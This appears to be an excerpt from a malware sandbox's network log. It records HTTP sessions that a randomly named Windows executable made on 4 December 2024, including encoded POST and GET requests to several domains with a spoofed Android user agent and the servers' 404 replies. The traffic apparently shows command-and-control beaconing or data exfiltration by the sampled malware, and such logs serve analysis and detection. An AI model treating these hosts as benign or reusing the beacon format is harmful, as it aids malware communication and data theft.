                                                                                2192.168.2.749812156.251.17.224807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:31:42.747390032 CET770OUTPOST /fyc8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.duwixushx.xyz
                                                                                Origin: http://www.duwixushx.xyz
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.duwixushx.xyz/fyc8/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 77 6f 47 45 34 34 4b 56 65 31 7a 7a 33 4d 35 73 46 45 6d 31 55 32 67 75 53 76 6f 31 67 5a 6b 4c 6a 4a 64 49 59 58 66 46 4d 4a 69 34 70 35 49 77 70 56 77 72 6a 62 2b 4d 68 7a 61 2f 35 78 6d 53 49 72 63 49 65 54 50 2b 34 71 34 70 6d 67 42 30 34 36 50 41 33 75 5a 53 37 41 51 6e 38 7a 32 4b 44 42 6f 6b 47 54 68 62 4a 41 32 42 57 36 32 39 56 78 6a 62 42 6f 49 63 2f 2f 51 6d 49 38 75 44 41 61 66 48 7a 46 39 33 44 59 74 2b 6f 68 57 79 68 6b 75 69 63 30 4e 4c 54 49 37 31 47 53 73 74 30 4b 61 6e 4e 55 56 2f 4c 68 38 76 61 49 62 54 46 71 49 4b 33 79 58 43 37 4b 41 51 79 4a 64 52 63 59 6b 56 76 7a 48 30 50 45 59 7a 45 75 57 4c 32 41 6e 43 38 47 53 73 35 52 6a 56 57 66 4b 76 76 38 6a 69 6a 38 51 3d
                                                                                Data Ascii: GhEtuH=woGE44KVe1zz3M5sFEm1U2guSvo1gZkLjJdIYXfFMJi4p5IwpVwrjb+Mhza/5xmSIrcIeTP+4q4pmgB046PA3uZS7AQn8z2KDBokGThbJA2BW629VxjbBoIc//QmI8uDAafHzF93DYt+ohWyhkuic0NLTI71GSst0KanNUV/Lh8vaIbTFqIK3yXC7KAQyJdRcYkVvzH0PEYzEuWL2AnC8GSs5RjVWfKvv8jij8Q=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.749818156.251.17.224807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:31:45.408376932 CET1783OUTPOST /fyc8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.duwixushx.xyz
                                                                                Origin: http://www.duwixushx.xyz
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.duwixushx.xyz/fyc8/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 77 6f 47 45 34 34 4b 56 65 31 7a 7a 33 4d 35 73 46 45 6d 31 55 32 67 75 53 76 6f 31 67 5a 6b 4c 6a 4a 64 49 59 58 66 46 4d 49 32 34 70 4b 41 77 70 79 73 72 69 62 2b 4d 6f 54 61 2b 35 78 6e 4f 49 6f 73 45 65 54 4c 45 34 73 38 70 67 78 68 30 6f 4c 50 41 75 65 5a 53 79 67 51 6d 6b 54 32 66 44 42 34 2f 47 58 4e 62 4a 41 32 42 57 38 53 39 57 6b 44 62 53 34 49 62 34 2f 51 69 4d 38 75 76 41 61 32 38 7a 47 52 4a 44 4c 31 2b 6f 42 6d 79 6a 57 32 69 64 55 4e 4e 55 49 37 74 47 53 6f 4d 30 4c 32 52 4e 56 67 6f 4c 68 45 76 4b 4a 75 53 63 75 38 57 6f 42 37 45 34 35 6b 41 6e 66 31 6d 57 5a 30 68 33 6b 58 7a 4c 6d 6b 36 4c 39 53 77 2b 55 36 53 70 58 57 53 39 52 54 43 46 34 4f 6b 7a 73 66 57 2b 4b 31 31 4b 57 58 45 6e 44 58 36 75 53 64 6b 4a 63 45 4f 41 75 2b 49 58 2f 50 43 54 74 77 42 33 53 63 53 50 76 4d 4f 35 4a 73 2f 42 42 69 70 35 63 30 6f 38 78 73 44 56 2b 6c 62 33 32 44 71 56 48 6d 4b 34 51 55 58 4d 54 76 37 6b 6d 64 56 73 38 4a 47 6b 52 4a 54 4d 6c 4d 41 69 43 42 6c 75 64 67 42 4c 6e 52 [TRUNCATED]
                                                                                Data Ascii: GhEtuH=woGE44KVe1zz3M5sFEm1U2guSvo1gZkLjJdIYXfFMI24pKAwpysrib+MoTa+5xnOIosEeTLE4s8pgxh0oLPAueZSygQmkT2fDB4/GXNbJA2BW8S9WkDbS4Ib4/QiM8uvAa28zGRJDL1+oBmyjW2idUNNUI7tGSoM0L2RNVgoLhEvKJuScu8WoB7E45kAnf1mWZ0h3kXzLmk6L9Sw+U6SpXWS9RTCF4OkzsfW+K11KWXEnDX6uSdkJcEOAu+IX/PCTtwB3ScSPvMO5Js/BBip5c0o8xsDV+lb32DqVHmK4QUXMTv7kmdVs8JGkRJTMlMAiCBludgBLnRMprhdaYAeRtT0FURYNkkBPd/kxSWtGN8bBvyJD0IHLLWHbpVDlRziUSWcrDdVYVGxcsRDHVsXbRrXy/ikVcFZbM98iYwvvqAjayZqWSclYDARqBVZaSMKdTzIN72rXabHlbhZLUzMKauHmv7SWAPsyTib2O39p68QOwhFNtwOQIVCgnHfufGP333Zm1cjAvovryLhtq9xvFoBqsd+Iko1iJATNTzvtSf9vsdJbJuiLHvKNIBnWUHlZOTQw7wJZbl4MT/NrnK4eexRCBvNfQkd5UIGgPFclvovBbb+47+v13keDnDVB7SVfN6TPlqdrvziEHR7brIbaZSQdu+oFu8Cp9nwy4X+q53SKLc7CXP2dtJYb/1m5IcntkToEtRW+iALgAFokRH83jJk++Q+VxYlvbqvDXMm7F3rdilJ2TsOVnS5QvlvPHEefvb7Anp2ljvzQE+sLcszErzePnUJl036f1W7xmdFzC8EZnHakL6ry8TRueqX0x4DgY/uUHYnYfiioC1RZ3s74jZnZGqMXNan7Ryx2PFgMLHGdGTqH7RKXB7O2qAt0NG0F5D6zgEV/iftP8Yr8+lrW9554l75U709ZzmZ+faBPp8hKd9xij9TpARJSYlBXBcfK++R72AyyzJYMtF8hYNzbgKK0FJb6EmTeftWhAyyXzVr8 [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.749825156.251.17.224807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:31:48.059942961 CET491OUTGET /fyc8/?GhEtuH=9quk7MnvWgGB/+oSKiWFDzYoPJYT6eA3ueh2PF/6PpTLuIpSuGh5poP5vhKU1hzLJrxVAWnbk59J+ABTrLnIqcNR2VABk2apNjRDHz4+NFXCe5SYECaGO4YN/+FCU+q/RL6A2UBNebQ0&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.duwixushx.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:31:49.734977007 CET289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Wed, 04 Dec 2024 14:31:49 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.749842172.67.145.234807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:31:55.184544086 CET738OUTPOST /t4v0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.vayui.top/t4v0/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 4d 59 69 6b 41 2b 61 61 6f 63 48 41 2f 70 64 37 77 2f 6e 6c 30 74 55 71 2b 6c 4d 75 52 31 49 76 45 59 57 65 68 6b 37 59 71 66 51 78 6c 32 45 77 48 30 2f 39 4b 55 52 6a 30 43 57 77 77 75 78 4f 74 51 6d 6a 31 32 70 4c 56 4c 57 6d 75 43 51 76 37 39 2f 69 70 66 71 41 41 42 59 56 73 4e 32 74 44 38 54 62 6e 39 7a 41 75 6f 45 65 31 4a 78 6a 6a 31 73 37 45 74 35 2f 6d 68 55 52 4a 50 65 57 65 48 51 58 7a 43 56 2f 4b 4f 56 34 59 63 6b 6c 4e 6a 4c 30 57 51 63 52 6e 41 34 45 52 72 46 67 4a 78 4e 57 30 74 57 76 72 51 54 4c 71 36 32 48 67 6e 69 43 62 66 6b 30 69 5a 6b 6d 76 73 70 66 6c 34 43 65 6e 6a 69 38 37 6f 75 44 2b 39 5a 6c 66 67 3d 3d
                                                                                Data Ascii: GhEtuH=MYikA+aaocHA/pd7w/nl0tUq+lMuR1IvEYWehk7YqfQxl2EwH0/9KURj0CWwwuxOtQmj12pLVLWmuCQv79/ipfqAABYVsN2tD8Tbn9zAuoEe1Jxjj1s7Et5/mhURJPeWeHQXzCV/KOV4YcklNjL0WQcRnA4ERrFgJxNW0tWvrQTLq62HgniCbfk0iZkmvspfl4Cenji87ouD+9Zlfg==
                                                                                Dec 4, 2024 15:31:56.567378044 CET910INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:31:56 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L5K3JaNCNdMZuzO%2FzysS2IExwivlQI3M2Q7OC4QPCUv%2BPSQlrTn6HpiuoNVXdb6Iyv2mg7f9%2FzVDvdu%2Fb48Dg%2Ff640TWSRQ78OM170OHvAihMEcbIBgvzJ93aRAjFBfK"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc80c07ea0431a-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.749846172.67.145.234807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:31:57.850023031 CET758OUTPOST /t4v0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.vayui.top/t4v0/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 4d 59 69 6b 41 2b 61 61 6f 63 48 41 2b 4a 4e 37 32 59 54 6c 6a 39 55 74 77 46 4d 75 65 56 49 72 45 59 53 65 68 6c 2f 49 72 71 34 78 6d 54 41 77 47 32 48 39 48 30 52 6a 2f 69 57 70 74 2b 78 37 74 51 36 42 31 33 56 4c 56 4c 43 6d 75 48 55 76 36 4b 6a 6a 70 50 71 43 62 52 59 58 69 74 32 74 44 38 54 62 6e 39 6e 6d 75 6f 4d 65 31 34 42 6a 67 55 73 34 4a 4e 35 38 68 68 55 52 4e 50 65 53 65 48 51 70 7a 44 35 5a 4b 4d 74 34 59 59 6f 6c 4b 78 76 33 4e 67 63 58 74 67 34 52 56 4a 70 6f 46 42 42 4e 2b 37 4b 41 72 51 58 36 69 73 33 6c 36 46 75 75 46 4f 63 50 6d 62 41 51 34 4b 30 71 6e 35 47 47 71 42 57 64 6b 66 4c 70 7a 76 34 68 4a 51 43 43 33 4b 43 4c 4c 54 55 69 73 72 46 4c 34 46 2f 51 36 75 55 3d
                                                                                Data Ascii: GhEtuH=MYikA+aaocHA+JN72YTlj9UtwFMueVIrEYSehl/Irq4xmTAwG2H9H0Rj/iWpt+x7tQ6B13VLVLCmuHUv6KjjpPqCbRYXit2tD8Tbn9nmuoMe14BjgUs4JN58hhURNPeSeHQpzD5ZKMt4YYolKxv3NgcXtg4RVJpoFBBN+7KArQX6is3l6FuuFOcPmbAQ4K0qn5GGqBWdkfLpzv4hJQCC3KCLLTUisrFL4F/Q6uU=
                                                                                Dec 4, 2024 15:31:59.217195988 CET906INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:31:59 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VziJ2wwLAzfONIBWpdVJNOSz6p%2FRpPbEpeG0HHnLhHVZqJxGPqvNjMFVSCaF%2Fw6H28ggUgyrUfLRsdWK39X2TpQN6CxdlI8B4ykZHbu4dOcH%2FmSqE0uaKW7F4OsHmjBw"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc80d10dc17c69-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.749850172.67.145.234807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:32:00.614108086 CET1771OUTPOST /t4v0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.vayui.top/t4v0/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 4d 59 69 6b 41 2b 61 61 6f 63 48 41 2b 4a 4e 37 32 59 54 6c 6a 39 55 74 77 46 4d 75 65 56 49 72 45 59 53 65 68 6c 2f 49 72 71 67 78 6c 68 49 77 48 52 72 39 49 55 52 6a 6b 43 57 30 74 2b 78 69 74 51 79 46 31 33 5a 78 56 4a 36 6d 38 78 6f 76 72 50 58 6a 6d 50 71 43 53 78 59 55 73 4e 33 33 44 34 50 58 6e 39 33 6d 75 6f 4d 65 31 37 5a 6a 32 31 73 34 4c 4e 35 2f 6d 68 55 72 4a 50 65 36 65 48 59 66 7a 44 4e 57 4c 39 4e 34 5a 34 34 6c 4d 43 4c 33 42 67 63 56 75 67 35 55 56 4a 6b 32 46 41 74 76 2b 37 57 71 72 58 6a 36 79 59 47 65 71 32 2b 6b 55 4e 77 50 6c 71 6f 58 78 37 56 61 69 34 71 6e 76 41 43 4f 67 50 54 48 71 65 6f 32 64 58 58 41 6a 62 66 68 49 53 73 6c 6a 62 51 43 6f 55 6e 71 6b 37 4f 71 2f 49 5a 65 77 61 35 77 55 41 54 43 34 63 4e 69 77 50 78 4d 6e 43 6b 32 46 52 4f 47 68 79 48 45 51 30 56 30 34 79 33 6b 44 4c 31 32 51 5a 59 69 72 42 46 79 52 74 79 75 6d 6f 35 6a 76 73 50 6f 70 42 4f 71 57 6c 73 6d 35 2f 7a 52 43 78 62 4a 59 37 52 56 32 4e 70 70 45 65 36 68 63 75 39 49 79 51 4f [TRUNCATED]
                                                                                Data Ascii: GhEtuH=MYikA+aaocHA+JN72YTlj9UtwFMueVIrEYSehl/IrqgxlhIwHRr9IURjkCW0t+xitQyF13ZxVJ6m8xovrPXjmPqCSxYUsN33D4PXn93muoMe17Zj21s4LN5/mhUrJPe6eHYfzDNWL9N4Z44lMCL3BgcVug5UVJk2FAtv+7WqrXj6yYGeq2+kUNwPlqoXx7Vai4qnvACOgPTHqeo2dXXAjbfhISsljbQCoUnqk7Oq/IZewa5wUATC4cNiwPxMnCk2FROGhyHEQ0V04y3kDL12QZYirBFyRtyumo5jvsPopBOqWlsm5/zRCxbJY7RV2NppEe6hcu9IyQOlXXgGxnsUdXEk6EN2M05unzXlONuziKs4GEoSFHNvS8nklS28mWTgpfAkn3a9M3CZ1hJ8edv+sEYOwXA0/fCQZBdO3gjQiN/eXaXX5lZCji/P1VUAU6zhk3HNDlxFZRnnvaF9XD5tXc3r0QUPem1Fvb5VvK0pHS7XEoCuCuEIntb7F5+cbPlWGcUWOeBagm5aSv5nqrXxgo4ArgWCLGaatlanR1FHr6DqzmL1tPFbfvrC6Q389Fk8XgxFL8N2cgkC8JqvbmFJm2Qx3QY/ESDkWyVGF8wRrxkULaVNobxcvs496skYhq+waT6k7dC8BzIC/xkfhldR2vMQ/m0rEAiyuplxN329gkjxLG6mfSP9MrRHRZLqzS/m/Pfr+U5LxjxFy8UeV6P67zhSJzMAkWGfk1nVsBLnwQazxwOPXpxyTeD/tYdNGa7XgIc/0qxNHNP9t5rwOjQH5vOuG+09L2BTGBykxqQD6K+e/mOLnc4BL/8nahOlcWRrJVl2oZRp0JSyU6Ct7Pdw02CfHzkK0hiafe72E1XEDe82NpSECcw64hRqYg6Txe18JhY8F6hbtcBXQx3aUCZBRYZtTDZ1C63pCb0L932mSC2ecEruIp31Sv+kAjd/VCcNL5ZNRBxzo7exXLFK6ukvifMzm/PNNNA0RA+XYZ5B/HaZP [TRUNCATED]
                                                                                Dec 4, 2024 15:32:01.964569092 CET910INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:32:01 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7Vsc7NGA4n8k32ZoAsbwPevv50no6lWQvkG155Heu4pSJ8GF3T%2FfsAKxyLNzhA37lho8OAcXmqKqNl9uYCISyB6EoaE9HvWHsnZBcYHR3x6qXbhrTqO%2BQJeYli%2B5BOL"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc80e1abfc4295-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=13333&min_rtt=13333&rtt_var=6666&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1771&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.749856172.67.145.234807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:32:03.380013943 CET487OUTGET /t4v0/?GhEtuH=BaKEDIuCqsvR37Bn6+TgiJMwkxJzDUIqAYq0m1TFifk8gDAIMlekNhph8Tar9Z0dtwi6g0hFX56VxC4Q/su0r8fyWQFgq8KpC42yk6uDr99A+ZghhUp+L9tXlGYeR9GDO3Mz2SBmPslm&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.vayui.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:32:04.686894894 CET928INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:32:04 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXv0XkDv6GV8NH9ejLZbzSOne8aUNPi%2BrB3rpa5pcQNGtoc3cWQB%2FHM%2FxP09zwtL%2F%2F61P3H4F4NAe3cxnNAHZxaU%2F9vS9g2wz6BjJtlcLxQ3txTHWlYRUKOMNJDgOXBL"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc80f33b267285-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=13486&min_rtt=13486&rtt_var=6743&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=487&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.74987013.248.169.48807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:32:10.584470987 CET747OUTPOST /4azw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.remedies.pro
                                                                                Origin: http://www.remedies.pro
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.remedies.pro/4azw/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
